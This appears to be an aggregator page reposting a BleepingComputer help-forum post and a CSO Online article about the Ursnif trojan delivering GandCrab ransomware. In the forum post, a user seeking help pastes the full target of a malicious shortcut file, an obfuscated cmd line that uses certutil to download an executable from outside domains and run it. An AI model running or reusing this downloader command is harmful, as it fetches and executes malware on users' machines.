Featured Post

.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Image
.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputerPosted: 06 Jul 2020 11:33 AM PDT Hi all,Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage.. When I did double click it, I remember getting a standard windows dialog box. I believe it said the path did not exist or shortcut unavailable.. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder...  I ran scans with malwarebytes, Hitman with no results.The .lnk file target was:%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1The .lnk file 'start-in' was:"%APPDATA%\Mic…

Ursnif Trojan is back with fileless persistence - CSO Online

Ursnif Trojan is back with fileless persistence - CSO Online


Ursnif Trojan is back with fileless persistence - CSO Online

Posted: 25 Jan 2019 12:00 AM PST

Researchers warn about a new wave of attacks with an information-stealing Trojan called Ursnif that uses PowerShell and fileless execution mechanisms, making it harder to detect. Some of the attacks also deploy the GandCrab ransomware.

Ursnif, also known as Dreambot, has been around for some time and initially focused on stealing emails and online banking credentials from browsers. However, the Trojan has modules that extend its functionality and has recently been used to deploy other malware as well.

For example, researchers from Carbon Black have observed a spam campaign over the past month that distributes Ursnif, which in turn installs the GandCrab ransomware. "The overall attack leverages several different approaches, which are popular techniques amongst red teamers, espionage focused adversaries and large scale criminal campaigns," the Carbon Black researcher said in a new report.

The attack chain starts off with spam emails that carry Word documents containing malicious macro scripts. The macros are obfuscated with junk code but are designed to execute an encoded PowerShell command stored in the Alternate Text field of an object inside the document.

Document macros and PowerShell scripts have been extensively abused to install malware on computers over the past few years because attackers like to live off the land and these features are present by default in Windows and Microsoft Office.

Ursnif's PowerShell script downloads a payload from a hard-coded command-and-control server and executes it directly in memory. This second payload then downloads another file in raw form from pastebin.com and injects it into the PowerShell process. The final payload is version 5.0.4 of GandCrab, a ransomware program sold on underground markets as a service, where its creators allow other cryber criminals to use it for a cut of the profits. There's already a decryption tool available for some GandCrab variants, but this appears to be a newer version.

Comments

Popular Posts

System detected an overrun of a stack-based buffer in this application [FIX] - Windows Report

Valorant anti-cheat lead answers many questions on Reddit - Millenium US